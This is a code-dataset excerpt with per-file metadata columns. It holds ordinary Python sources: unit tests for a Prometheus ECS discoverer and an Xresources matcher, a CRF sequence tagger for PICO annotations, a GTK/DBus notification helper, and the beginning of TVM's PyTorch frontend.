hexsha
stringlengths 40
40
| size
int64 1
1.03M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
239
| max_stars_repo_name
stringlengths 5
130
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
239
| max_issues_repo_name
stringlengths 5
130
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
239
| max_forks_repo_name
stringlengths 5
130
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 1
1.03M
| avg_line_length
float64 1
958k
| max_line_length
int64 1
1.03M
| alphanum_fraction
float64 0
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
4a07ac0d9bb2955a02af37b63e53a1f87c387621
| 2,479
|
py
|
Python
|
tests/test_toolbox.py
|
lejmr/prometheus-ecs-discoverer
|
d4968c6e3f8588a9f64157462a82420d099ac583
|
[
"Apache-2.0"
] | 12
|
2020-08-06T15:17:47.000Z
|
2021-10-06T05:21:06.000Z
|
tests/test_toolbox.py
|
lejmr/prometheus-ecs-discoverer
|
d4968c6e3f8588a9f64157462a82420d099ac583
|
[
"Apache-2.0"
] | 11
|
2020-08-01T22:13:29.000Z
|
2021-10-08T06:17:34.000Z
|
tests/test_toolbox.py
|
lejmr/prometheus-ecs-discoverer
|
d4968c6e3f8588a9f64157462a82420d099ac583
|
[
"Apache-2.0"
] | 3
|
2021-04-19T20:47:10.000Z
|
2021-10-01T14:29:09.000Z
|
import pytest
from prometheus_ecs_discoverer import toolbox
def test_chunk_list_with_even_size():
big_list = list(range(100))
chunks = toolbox.chunk_list(big_list, 10)
assert len(chunks) == 10
for chunk in chunks:
assert len(chunk) <= 10
def test_chunk_list_with_uneven_size():
big_list = list(range(103))
chunks = toolbox.chunk_list(big_list, 10)
assert len(chunks) == 11
for chunk in chunks:
assert len(chunk) <= 10
assert len(chunks[-1]) == 3
def test_extract_set():
dct = {
"descr1": {"att1": "fefefe", "att2": "fefegtrafgrgr"},
"descr2": {"att1": "OGOGOGO", "att2": "fefegtrafgrgr"},
"descr3": {"att1": "OGOGOGO", "att2": "fefegtrafgrgr"},
}
extract = toolbox.extract_set(dct, "att1")
assert len(extract) == 2
assert extract == {"fefefe", "OGOGOGO"}
def test_list_to_dict():
lst = [{"key1": "hallo", "key2": "my"}, {"key1": "old", "key2": "friend"}]
dct = toolbox.list_to_dict(lst, "key1")
assert dct == {
"hallo": {"key1": "hallo", "key2": "my"},
"old": {"key1": "old", "key2": "friend"},
}
def test_print_structure():
lst = [{"key1": "hallo", "key2": "my"}, {"key1": "old", "key2": "friend"}]
toolbox.pstruct(lst)
assert True
def test_validate_min_len():
lst = [{"this": "dict", "is": "too long"}, {"good": {"dict": "only", "len": "one"}}]
with pytest.raises(ValueError):
toolbox.validate_min_len(min_len=10, collections=lst)
toolbox.validate_min_len(min_len=1, collections=lst)
assert True
# ------------------------------------------------------------------------------
def test_extract_env_var():
container = {
"random": {"random": "random"},
"environment": [
{"name": "PROMETHEUS_PORT", "value": "80"},
{"name": "SOMETINGELSE", "value": "fefefwe"},
],
}
assert "80" == toolbox.extract_env_var(container, "PROMETHEUS_PORT")
assert None is toolbox.extract_env_var(container, "does not exist")
def test_extract_env_var_no_env():
container = {
"random": {"random": "random"},
}
assert None is toolbox.extract_env_var(container, "PROMETHEUS_PORT")
# ------------------------------------------------------------------------------
def test_extract_env_var_no_environment():
container = {"random": {"random": "random"}}
assert None is toolbox.extract_env_var(container, "does not exist")
| 26.37234
| 88
| 0.567568
|
4a07ac850b9e6883d26af6f9d28ab85e817e612e
| 10,183
|
py
|
Python
|
crf-seq/sets/sets/2/seq_detect_1o.py
|
roma-patel/lstm-crf
|
25012b1218b60090f467fe5ed5a15d7a28b3134c
|
[
"Apache-2.0"
] | 1
|
2020-02-24T06:25:17.000Z
|
2020-02-24T06:25:17.000Z
|
crf-seq/sets/sets/2/seq_detect_1o.py
|
roma-patel/lstm-crf
|
25012b1218b60090f467fe5ed5a15d7a28b3134c
|
[
"Apache-2.0"
] | null | null | null |
crf-seq/sets/sets/2/seq_detect_1o.py
|
roma-patel/lstm-crf
|
25012b1218b60090f467fe5ed5a15d7a28b3134c
|
[
"Apache-2.0"
] | null | null | null |
import pycrfsuite
import sklearn
from itertools import chain
from sklearn.metrics import classification_report, confusion_matrix
from sklearn.preprocessing import LabelBinarizer
import re
import json
annotypes = ['Participants', 'Intervention', 'Outcome']
annotype = annotypes[2]
path = '/nlp/data/romap/crf/'
#path = '/Users/romapatel/Desktop/crf/'
def run():
train_sents, test_sents = get_train_test_sets()
print len(test_sents)
indwords_list = get_ind_words()
patterns_list = get_patterns()
X_train = [sent_features(train_sents[docid], indwords_list, patterns_list) for docid in train_sents.keys()]
y_train = [sent_labels(train_sents[docid]) for docid in train_sents.keys()]
X_test = [sent_features(test_sents[docid], indwords_list, patterns_list) for docid in test_sents.keys()]
y_test = [sent_labels(test_sents[docid]) for docid in test_sents.keys()]
trainer = pycrfsuite.Trainer(verbose=False)
for xseq, yseq in zip(X_train, y_train):
trainer.append(xseq, yseq)
trainer.set_params({'c1': 1.0,'c2': 1e-3, 'max_iterations': 50, 'feature.possible_transitions': True})
trainer.train('PICO.crfsuite')
tagger = pycrfsuite.Tagger()
tagger.open('PICO.crfsuite')
get_results(test_sents, tagger, indwords_list, patterns_list)
def get_results(test_sents, tagger, indwords_list, patterns_list):
f1 = open(path + 'sets/2/' + annotype + '-test_pred.json', 'w+')
f2 = open(path + 'sets/2/' + annotype + '-test_correct.json', 'w+')
pred_dict, correct_dict = {}, {}
for docid in test_sents:
pred, correct = tagger.tag(sent_features(test_sents[docid], indwords_list, patterns_list)), sent_labels(test_sents[docid])
spans, span, outside = [], [], True
for i in range(len(pred)):
if pred[i] == '0' and outside is True: continue
elif pred[i] == '0' and outside is False:
span.append(i+1)
spans.append(span)
span, outside = [], True
elif pred[i] == '1' and outside is False: continue
elif pred[i] == '1' and outside is True:
outside = False
span.append(i)
pred_dict[docid] = spans
spans, span, outside = [], [], True
for i in range(len(correct)):
if correct[i] == '0' and outside is True: continue
elif correct[i] == '0' and outside is False:
span.append(i+1)
spans.append(span)
span, outside = [], True
elif correct[i] == '1' and outside is False: continue
elif correct[i] == '1' and outside is True:
outside = False
span.append(i)
correct_dict[docid] = spans
f1.write(json.dumps(pred_dict))
f2.write(json.dumps(correct_dict))
def get_ind_words():
fin_list = []
for annotype in annotypes:
list = []
#filename = annotype.lower() + '_words.txt'
filename = annotype.lower() + '_unigrams.tsv'
f = open(path + 'crf_files/' + filename, 'r')
for line in f:
#word = line[:-1]
items = line.split('\t')
word = items[1][:-1]
if word not in list:
list.append(word)
if annotype == 'Intervention':
f = open(path + 'crf_files/drug_names.txt', 'r')
for line in f:
word = line[:-1]
if word not in list:
list.append(word)
fin_list.append(list)
indwords = [fin_list[0], fin_list[1], fin_list[2]]
return indwords
#all lowercased
def get_patterns():
fin_list = []
for annotype in annotypes:
list = []
#filename = annotype.lower() + '_pattern_copy.txt'
filename = annotype.lower() + '_trigrams3.tsv'
f = open(path + 'crf_files/' + filename, 'r')
for line in f:
#word = line[:-1].lower()
word = line[:-1].split('\t')
word = word[1]
if word not in list:
list.append(word)
fin_list.append(list)
patterns = [fin_list[0], fin_list[1], fin_list[2]]
return patterns
def isindword(word, annotype, indwords_list):
if annotype == annotypes[0]: list = indwords_list[0]
elif annotype == annotypes[1]: list = indwords_list[1]
else: list = indwords_list[2]
if word.lower() in list or word.lower()[:-1] in list or word.lower()[-3:] in list: return True
else: return False
def ispattern(word, pos, annotype, pattern_list):
if annotype == annotypes[0]: list = pattern_list[0]
elif annotype == annotypes[1]: list = pattern_list[1]
else: list = pattern_list[2]
for pattern in pattern_list:
if word.lower() in pattern or pos.lower() in pattern: return True
else: return False
def word_features(sent, i, indwords_list, pattern_list):
word = sent[i][0]
postag = sent[i][2]
features = ['bias', 'word.lower=' + word.lower(),'word[-3:]=' + word[-3:],
'word[-4:]=' + word[-4:],'word.isupper=%s' % word.isupper(),
'word.istitle=%s' % word.istitle(), 'word.isdigit=%s' % word.isdigit(),
'postag=' + postag, 'isindword=%s' % isindword(word, annotype, indwords_list),
'word[0:4]=' + word[0:4], 'ispattern=%s' % ispattern(word, postag, annotype, pattern_list)]
#prev previous word
if i > 1:
word1 = sent[i-2][0]
postag1 = sent[i-2][2]
features.extend(['-1:word.lower=' + word1.lower(), '-1:word.istitle=%s' % word1.istitle(),
'-1:word.isupper=%s' % word1.isupper(), '-1:postag=' + postag1,
'isindword=%s' % isindword(word1, annotype, indwords_list), 'word[0:4]=' + word[0:4],
'word[-3:]=' + word[-3:]])
#previous word
if i > 0:
word1 = sent[i-1][0]
postag1 = sent[i-1][2]
features.extend(['-1:word.lower=' + word1.lower(), '-1:word.istitle=%s' % word1.istitle(),
'-1:word.isupper=%s' % word1.isupper(), '-1:postag=' + postag1,
'isindword=%s' % isindword(word1, annotype, indwords_list), 'word[0:4]=' + word[0:4],
'word[-3:]=' + word[-3:], 'ispattern=%s' % ispattern(word, postag, annotype, pattern_list)])
else:
features.append('BOS')
#next to next word
if i < len(sent)-2:
word1 = sent[i+2][0]
postag1 = sent[i+2][2]
features.extend(['+1:word.lower=' + word1.lower(), '+1:word.istitle=%s' % word1.istitle(),
'+1:word.isupper=%s' % word1.isupper(), '+1:postag=' + postag1,
'isindword=%s' % isindword(word1, annotype, indwords_list), 'word[0:4]=' + word[0:4],
'word[-3:]=' + word[-3:]])
#next word
if i < len(sent)-1:
word1 = sent[i+1][0]
postag1 = sent[i+1][2]
features.extend(['+1:word.lower=' + word1.lower(), '+1:word.istitle=%s' % word1.istitle(),
'+1:word.isupper=%s' % word1.isupper(), '+1:postag=' + postag1,
'isindword=%s' % isindword(word1, annotype, indwords_list), 'word[0:4]=' + word[0:4],
'word[-3:]=' + word[-3:], 'ispattern=%s' % ispattern(word, postag, annotype, pattern_list)])
else:
features.append('EOS')
return features
def sent_features(sent, indwords_list, patterns_list):
return [word_features(sent, i, indwords_list, patterns_list) for i in range(len(sent))]
def sent_labels(sent):
return [str(o_label) for token, ner, postag, p_label, i_label, o_label in sent]
def sent_tokens(sent):
return [token for token, ner, postag, p_label, i_label, o_label in sent]
def print_results(example_sent, tagger, indwords_list, docid, dict):
pred, correct = tagger.tag(sent_features(example_sent, indwords_list)), sent_labels(example_sent)
spans, span, outside = [], [], True
for i in range(len(pred)):
if pred[i] == '0' and outside is True: continue
elif pred[i] == '0' and outside is False:
span.append(i+1)
spans.append(span)
span, outside = [], True
elif pred[i] == '1' and outside is False: continue
elif pred[i] == '1' and outside is True:
outside = False
span.append(i)
f = open(path + annotype + '-test.json', 'w+')
print '\n\nPredicted: ' + str(spans)
for span in spans:
s = ' '
for i in range(span[0], span[1]):
s += example_sent[i][0] + ' '
print s
spans, span, outside = [], [], True
for i in range(len(correct)):
if correct[i] == '0' and outside is True: continue
elif correct[i] == '0' and outside is False:
span.append(i+1)
spans.append(span)
span, outside = [], True
elif correct[i] == '1' and outside is False: continue
elif correct[i] == '1' and outside is True:
outside = False
span.append(i)
print '\n\nCorrect: ' + str(spans)
for span in spans:
s = ' '
for i in range(span[0], span[1]):
s += example_sent[i][0] + ' '
print s
def get_training_data():
f = open(path + 'crf_files/difficulty_crf_mv.json', 'r')
for line in f:
dict = json.loads(line)
return dict
def get_train_test_sets():
test_docids = []
f = open(path + 'crf_files/gold_docids.txt', 'r')
for line in f:
test_docids.append(line[:-1])
doc_dict = get_training_data()
test_sents, train_sents = {}, {}
count = 0
for docid in doc_dict:
sents = doc_dict[docid]
if len(sents) == 0: continue
count += 1
#if count >= 100: break
if docid not in test_docids:
train_sents[docid] = sents
else:
test_sents[docid] = sents
f = open(path + 'difficulty_new.json', 'r')
for line in f:
doc_dict_new = json.loads(line)
count = 1
for docid in doc_dict_new:
if docid in train_sents.keys(): continue
if count == 4741: break
train_sents[docid] = doc_dict_new[docid]
count += 1
return train_sents, test_sents
if __name__ == '__main__':
run()
| 38.426415
| 130
| 0.578022
|
4a07ac85e1dd6a28b82dfdeb1af6ecb560da1b4f
| 1,588
|
py
|
Python
|
tests/test_match.py
|
atagen/xparser
|
35e6d5aecd7a7c775309a206e457ee3a00c3fc53
|
[
"MIT"
] | 2
|
2018-05-28T20:16:18.000Z
|
2021-06-30T02:39:52.000Z
|
tests/test_match.py
|
atagen/xparser
|
35e6d5aecd7a7c775309a206e457ee3a00c3fc53
|
[
"MIT"
] | 4
|
2021-01-28T14:05:17.000Z
|
2021-12-15T23:05:09.000Z
|
tests/test_match.py
|
atagen/xparser
|
35e6d5aecd7a7c775309a206e457ee3a00c3fc53
|
[
"MIT"
] | 2
|
2019-06-24T20:56:34.000Z
|
2021-12-15T23:08:51.000Z
|
import pytest
import xrp.match
class Test_MatchResource:
@pytest.mark.parametrize('resource_id,components', [
('*color0', ['*', 'color0']),
('?.color0', ['?', 'color0']),
('URxvt*foreground', ['URxvt', '*', 'foreground']),
('comp_a.*.comp_d.attribute', ['comp_a', '*', 'comp_d', 'attribute'])
])
def test_components(self, resource_id, components):
assert xrp.match._MatchResource.components(resource_id) == components
@pytest.mark.parametrize('components,padded', [
(['comp_a', '*', 'comp_d', 'attribute'], ['comp_a', '?', 'comp_d', 'attribute']),
(['*', 'color0'], ['?', '?', '?', 'color0'])
])
def test_pad_components(self, components, padded):
assert xrp.match._MatchResource.pad_components(components) == padded
@pytest.mark.parametrize('comp_1,comp_2,result', [
('URXvt', '?', True),
('?', 'color0', True),
('URxvt', 'color0', False),
('color0', 'color0', True)
])
def test_compare_component(self, comp_1, comp_2, result):
assert xrp.match._MatchResource.compare_component(comp_1, comp_2) == result
@pytest.mark.parametrize('resource_id,string,result', [
("comp_a.*.comp_d.attribute", "comp_a.*.attribute", True),
("comp_a.comp_b.*.attribute", "comp_a.comp_b.*.comp_d.attribute", True),
("comp_a.?.?.comp_d.attribute", "comp_a.*.attribute", True)
])
def test_compare(self, resource_id, string, result):
mr = xrp.match._MatchResource(resource_id, string)
assert mr.compare() == result
| 38.731707
| 89
| 0.604534
|
4a07acc95882ce20e1dbf86d22afb6b05e9a8741
| 12,581
|
py
|
Python
|
notus/gtk_dbus/gtk_toaster.py
|
cnheider/notus
|
f284132e87d7b274c3ea239f216959987e670910
|
[
"Apache-2.0"
] | null | null | null |
notus/gtk_dbus/gtk_toaster.py
|
cnheider/notus
|
f284132e87d7b274c3ea239f216959987e670910
|
[
"Apache-2.0"
] | null | null | null |
notus/gtk_dbus/gtk_toaster.py
|
cnheider/notus
|
f284132e87d7b274c3ea239f216959987e670910
|
[
"Apache-2.0"
] | 2
|
2021-02-04T15:04:16.000Z
|
2021-02-04T15:05:30.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import gi
gi.require_version("Gtk", "3.0")
from gi.repository import GdkPixbuf
import time
import dbus
__author__ = "Christian Heider Nielsen"
__doc__ = (
"Based on the notifications spec at: http://developer.gnome.org/notification-spec/"
)
__version__ = "0.0.1"
EXPIRES_DEFAULT = -1
EXPIRES_NEVER = 0
URGENCY_LOW = 0
URGENCY_NORMAL = 1
URGENCY_CRITICAL = 2
urgency_levels = [URGENCY_LOW, URGENCY_NORMAL, URGENCY_CRITICAL]
IS_SETUP = False
APP_NAME = f"unnamed_app_{time.time()}"
HAVE_MAINLOOP = False
NOTIFICATIONS_REGISTRY = {}
__all__ = ["GtkToast"]
def action_callback(nid, action, notifications_registry) -> None:
"""
:param nid:
:type nid:
:param action:
:type action:
:param notifications_registry:
:type notifications_registry:
:return:
:rtype:
"""
nid, action = int(nid), str(action)
try:
n = notifications_registry[nid]
except KeyError: # this message was created through some other program.
return
n.action_callback(action, notifications_registry)
def closed_callback(nid, reason, notifications_registry) -> None:
"""
:param nid:
:type nid:
:param reason:
:type reason:
:param notifications_registry:
:type notifications_registry:
:return:
:rtype:
"""
nid, reason = int(nid), int(reason)
try:
n = notifications_registry[nid]
except KeyError: # this message was created through some other program.
return
n.closed_callback(n)
del notifications_registry[nid]
def no_op(*args):
"""No-op function for callbacks."""
pass
# TODO: Object orient globals!
class NotSetupError(RuntimeError):
"""Error raised if you try to communicate with the server before calling
:func:`init`."""
pass
class UnconstructedDbusObject(object):
def __getattr__(self, name):
raise NotSetupError("You must call toaster.init() first")
dbus_interface = UnconstructedDbusObject()
def init(app_name, mainloop=None):
"""Initialise the D-Bus connection. Must be called before you send any
notifications, or retrieve server info or capabilities.
To get callbacks from notifications, DBus must be integrated with a mainloop.
There are three ways to achieve this:
- Set a default mainloop (dbus.set_default_main_loop) before calling init()
- Pass the mainloop parameter as a string 'glib' or 'qt' to integrate with
those mainloops. (N.B. passing 'qt' currently makes that the default dbus
mainloop, because that's the only way it seems to work.)
- Pass the mainloop parameter a DBus compatible mainloop instance, such as
dbus.mainloop.glib.DBusGMainLoop().
If you only want to display notifications, without receiving information
back from them, you can safely omit mainloop."""
global APP_NAME, IS_SETUP, dbus_interface, HAVE_MAINLOOP
if mainloop == "glib":
from dbus.mainloop.glib import DBusGMainLoop
mainloop = DBusGMainLoop()
elif mainloop == "qt":
from dbus.mainloop.qt import DBusQtMainLoop
# For some reason, this only works if we make it the default mainloop
# for dbus. That might make life tricky for anyone trying to juggle two
# event loops, but I can't see any way round it.
mainloop = DBusQtMainLoop(set_as_default=True)
bus = dbus.SessionBus(mainloop=mainloop)
dbus_obj = bus.get_object(
"org.freedesktop.Notifications", "/org/freedesktop/Notifications"
)
dbus_interface = dbus.Interface(
dbus_obj, dbus_interface="org.freedesktop.Notifications"
)
APP_NAME = app_name
IS_SETUP = True
if mainloop or dbus.get_default_main_loop():
HAVE_MAINLOOP = True
dbus_interface.connect_to_signal("ActionInvoked", action_callback)
dbus_interface.connect_to_signal("NotificationClosed", closed_callback)
return True
def is_initted():
"""Has init() been called? Only exists for compatibility with pynotify."""
return IS_SETUP
def get_app_name():
"""Return appname. Only exists for compatibility with pynotify."""
return APP_NAME
def de_init():
"""Undo what init() does."""
global IS_SETUP, dbus_interface, HAVE_MAINLOOP
IS_SETUP = False
HAVE_MAINLOOP = False
dbus_interface = UnconstructedDbusObject()
# Retrieve basic server information --------------------------------------------
def get_server_caps():
"""Get a list of server capabilities.
These are short strings, listed `in the spec
<http://people.gnome.org/~mccann/docs/notification-spec/notification-spec-latest.html#commands>`_.
Vendors may also list extra capabilities with an 'x-' prefix, e.g. 'x-canonical-append'."""
return [str(x) for x in dbus_interface.GetCapabilities()]
def get_server_info():
"""Get basic information about the server."""
res = dbus_interface.GetServerInformation()
return {
"name": str(res[0]),
"vendor": str(res[1]),
"version": str(res[2]),
"spec-version": str(res[3]),
}
class GtkToast(object):
"""A notification object.
summary : str
The title text
message : str
The body text, if the server has the 'body' capability.
icon : str
Path to an icon image, or the name of a stock icon. Stock icons available
in Ubuntu are `listed here <https://wiki.ubuntu.com/NotificationDevelopmentGuidelines
#How_do_I_get_these_slick_icons>`_.
You can also set an icon from data in your application - see
:meth:`set_icon_from_pixbuf`."""
_id = 0
_timeout = -1 # -1 = server default settings
_closed_callback = no_op
def __init__(self, title, body="", *, icon=""):
self.title = title
self.body = body
self._hints = {}
if isinstance(icon, GdkPixbuf.Pixbuf):
self._icon = ""
self.set_hint("icon_data", icon)
else:
self._icon = icon
self._actions = {}
self._data = {} # Any data the user wants to attach
def show(self):
"""Ask the server to show the notification.
Call this after you have finished setting any parameters of the
notification that you want."""
nid = dbus_interface.Notify(
APP_NAME, # app_name (spec names)
self._id, # replaces_id
self._icon, # app_icon
self.title, # summary
self.body, # body
self._make_actions_array(), # actions
self._hints, # hints
self._timeout, # expire_timeout
)
self._id = int(nid)
if HAVE_MAINLOOP:
NOTIFICATIONS_REGISTRY[self._id] = self
return True
def update(self, title, body="", *, icon=None):
"""Replace the summary and body of the notification, and optionally its
icon. You should call :meth:`show` again after this to display the
updated notification."""
self.title = title
self.body = body
if icon is not None:
self._icon = icon
def close(self):
"""Ask the server to close this notification."""
if self._id != 0:
dbus_interface.CloseNotification(self._id)
def set_hint(self, key, value):
"""n.set_hint(key, value) <--> n.hints[key] = value
See `hints in the spec <http://people.gnome.org/~mccann/docs/notification-spec/notification-spec-latest
.html#hints>`_.
Only exists for compatibility with pynotify."""
self._hints[key] = value
set_hint_string = set_hint_int32 = set_hint_double = set_hint
def set_hint_byte(self, key, value):
"""Set a hint with a dbus byte value. The input value can be an
integer or a bytes string of length 1."""
self._hints[key] = dbus.Byte(value)
def set_urgency(self, level):
"""Set the urgency level to one of URGENCY_LOW, URGENCY_NORMAL or
URGENCY_CRITICAL."""
if level not in urgency_levels:
raise ValueError("Unknown urgency level specified", level)
self.set_hint_byte("urgency", level)
def set_category(self, category):
"""Set the 'category' hint for this notification.
See `categories in the spec <http://people.gnome.org/~mccann/docs/notification-spec/notification-spec
-latest.html#categories>`_."""
self._hints["category"] = category
def set_timeout(self, timeout):
"""Set the display duration in milliseconds, or one of the special
values EXPIRES_DEFAULT or EXPIRES_NEVER. This is a request, which the
server might ignore.
Only exists for compatibility with pynotify; you can simply set::
n.timeout = 5000"""
if not isinstance(timeout, int):
raise TypeError("timeout value was not int", timeout)
self._timeout = timeout
def get_timeout(self):
"""Return the timeout value for this notification.
Only exists for compatibility with pynotify; you can inspect the
timeout attribute directly."""
return self._timeout
def add_action(self, action, label, callback, user_data=None):
"""Add an action to the notification.
Check for the 'actions' server capability before using this.
action : str
A brief key.
label : str
The text displayed on the action button
callback : callable
A function taking at 2-3 parameters: the Notification object, the
action key and (if specified) the user_data.
user_data :
An extra argument to pass to the callback."""
self._actions[action] = (label, callback, user_data)
def _make_actions_array(self):
"""Make the actions array to send over DBus."""
arr = []
for action, (label, callback, user_data) in self._actions.items():
arr.append(action)
arr.append(label)
return arr
def _action_callback(self, action):
"""Called when the user selects an action on the notification, to
dispatch it to the relevant user-specified callback."""
try:
label, callback, user_data = self._actions[action]
except KeyError:
return
if user_data is None:
callback(self, action)
else:
callback(self, action, user_data)
def connect(self, event, callback):
"""Set the callback for the notification closing; the only valid value
for event is 'closed' (the parameter is kept for compatibility with pynotify).
The callback will be called with the :class:`Notification` instance."""
if event != "closed":
raise ValueError("'closed' is the only valid value for event", event)
self._closed_callback = callback
def set_data(self, key, value):
"""n.set_data(key, value) <--> n.data[key] = value
Only exists for compatibility with pynotify."""
self._data[key] = value
def get_data(self, key):
"""n.get_data(key) <--> n.data[key]
Only exists for compatibility with pynotify."""
return self._data[key]
def set_icon_from_pixbuf(self, icon):
"""Set a custom icon from a GdkPixbuf."""
self._hints["icon_data"] = self._get_icon_struct(icon)
@staticmethod
def _get_icon_struct(icon):
return (
icon.get_width(),
icon.get_height(),
icon.get_rowstride(),
icon.get_has_alpha(),
icon.get_bits_per_sample(),
icon.get_n_channels(),
dbus.ByteArray(icon.get_pixels()),
)
def set_location(self, x, y):
"""Set the notification location as (x, y), if the server supports it."""
if (not isinstance(x, int)) or (not isinstance(y, int)):
raise TypeError("x and y must both be ints", (x, y))
self._hints["x"] = x
self._hints["y"] = y
if __name__ == "__main__":
import gi
gi.require_version("Gtk", "3.0")
from gi.repository import Gtk
init("Test")
helper = Gtk.Button()
a_icon = helper.render_icon(Gtk.STOCK_DIALOG_INFO, Gtk.IconSize.DIALOG)
t = GtkToast("Title", "Body")
t.set_icon_from_pixbuf(a_icon)
for i in range(10):
t.title = f"Title{i}"
t.body = f"Body{i}"
t.show()
time.sleep(0.1)
if i == 4:
a_icon = helper.render_icon(Gtk.STOCK_DIALOG_QUESTION, Gtk.IconSize.DIALOG)
t.set_icon_from_pixbuf(a_icon)
| 30.835784
| 111
| 0.642636
|
4a07ad6444cdc64ed80ffb255dddff83b553abea
| 147,637
|
py
|
Python
|
python/tvm/relay/frontend/pytorch.py
|
T-head-Semi/tvm
|
c1b8e06685c92fb7cacbe989e147b0622aee4503
|
[
"Apache-2.0"
] | 4
|
2021-10-19T06:22:55.000Z
|
2022-03-17T22:55:12.000Z
|
python/tvm/relay/frontend/pytorch.py
|
T-head-Semi/tvm
|
c1b8e06685c92fb7cacbe989e147b0622aee4503
|
[
"Apache-2.0"
] | null | null | null |
python/tvm/relay/frontend/pytorch.py
|
T-head-Semi/tvm
|
c1b8e06685c92fb7cacbe989e147b0622aee4503
|
[
"Apache-2.0"
] | 2
|
2021-10-19T03:28:37.000Z
|
2022-03-17T22:55:14.000Z
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=import-self, too-many-lines, len-as-condition, no-else-return, unused-variable, too-many-nested-blocks
# pylint: disable=consider-iterating-dictionary, invalid-name, unused-argument, unused-variable, broad-except
# pylint: disable=import-outside-toplevel, simplifiable-if-expression, cell-var-from-loop, unnecessary-lambda
# pylint: disable=missing-function-docstring
"""PT: PyTorch frontend."""
import functools
import itertools
import logging
import math
import sys
import numpy as np
import tvm
from tvm.ir import IRModule
from tvm.topi.utils import get_const_tuple
from .. import analysis as _analysis
from .. import expr as _expr
from .. import function as _function
from .. import op as _op
from .. import qnn, transform
from ..expr_functor import ExprMutator
from ..loops import while_loop
from ..prelude import Prelude, StaticTensorArrayOps
from ..ty import Any, TensorType, TupleType
from . import qnn_torch
from .common import AttrCvt, get_relay_op, gru_cell
from .common import infer_shape as _infer_shape
from .common import infer_value as _infer_value
from .common import infer_value_simulated as _infer_value_simulated
from .common import lstm_cell, try_infer_value, unbind
from .common import set_span
from .pytorch_utils import is_version_greater_than
__all__ = ["from_pytorch"]
# This returns a "subgraph" which puts variables whenever
# the type is known. It also records things to map the input
# nodes to the extracted graph's nodes.
# As Python objects are not round-trippable through C++, and
# our type annotations only live in Python, we need to map
# the we need to map the nodes we get in visiting to the nodes
# we used to construct the graph (they are the same in C++,
# match each other in dictionary lookups, but are not the same
# in Python) by using the hint dictionary filled as
# {node: node for node in nodes} to get the type annotations.
# https://discuss.tvm.apache.org/t/round-tripping-objects-through-the-ffi/8440
class _TypeFinder(ExprMutator):
def __init__(self, types):
super().__init__()
self.counter = 0
self.vars = {}
self.types = types
self.leave = set() # some variables are not inputs
def visit_let(self, let):
self.leave.add(let.var)
return super().visit_let(let)
def visit_function(self, fn):
self.leave.update(fn.params)
return super().visit_function(fn)
def visit(self, expr):
if expr in self.leave:
return super().visit(expr)
if expr in self.vars:
return self.vars[expr]
if isinstance(expr, tvm.relay.Var):
self.vars[expr] = expr
return expr
if expr in self.types:
ty = self.types[expr]
v = tvm.relay.var(f"_{self.counter}", type_annotation=ty)
self.counter += 1
self.vars[expr] = v
return v
v = super().visit(expr)
return v
def _should_construct_dynamic_list(list_construct_node):
# if this list is element-accessed or modified at runtime, generate List ADT
def inplace_add_to_add(op_name):
if op_name == "aten::add_":
return "aten::add"
else:
return op_name
uses = _get_uses(list_construct_node)
for loop_use in filter(lambda use: use.user.kind() == "prim::Loop", uses):
block_input_index = loop_use.offset - 1
block = list(loop_use.user.blocks())[0]
list_loop_var = list(block.inputs())[block_input_index]
uses += _get_uses(list_loop_var.node())
op_names = map(inplace_add_to_add, set(use.user.kind() for use in uses))
list_ops = set(["aten::add", "aten::__getitem__"])
intersect = list_ops.intersection(op_names)
if len(intersect) > 0 and intersect != set(["aten::add"]):
return True
# if add op outputs list, it is dynamic so we need to construct List ADT
for use in filter(lambda use: use.user.kind() in ["aten::add", "aten::add_"], uses):
output_type = _get_node_type(use.user)
if output_type == "ListType":
return True
return False
def _is_int_seq(seq):
# TODO (t-vi): handle non-int constants? (like numpy.intXX)
return len(seq) > 0 and all([isinstance(i, int) for i in seq])
# operator implementation
class PyTorchOpConverter:
"""A helper class for holding PyTorch op converters."""
def __init__(self, prelude, default_dtype):
self.prelude = prelude
self.default_dtype = default_dtype
self.create_convert_map()
self.types = {} # map from nodes to (Relay) type annotations
# this incrementally infers the type, see the comments on the type visitor
# above.
def infer_type(self, node, mod=None):
"""An incremental method to infer the type of a node in the relay graph."""
if node in self.types:
return self.types[node]
if isinstance(node, tvm.relay.Var):
return node.type_annotation
tf = _TypeFinder(types=self.types)
new_node = tf.visit(node)
fn = _function.Function(list(tf.vars.values()), new_node)
new_mod = IRModule({"main": fn})
if mod is not None:
new_mod.update(mod)
new_mod = transform.RemoveUnusedFunctions()(new_mod)
new_mod = transform.InferType()(new_mod)
entry = new_mod["main"]
ty = entry.body.checked_type
self.types[node] = ty
return self.types[node]
def infer_type_with_prelude(self, val):
body = self.infer_type(val, self.prelude.mod)
return body
# list ADT utilities
def convert_to_list_adt(self, py_lst):
elem_tys = [self.infer_type_with_prelude(elem) for elem in py_lst]
msg = "List elements should have identical types"
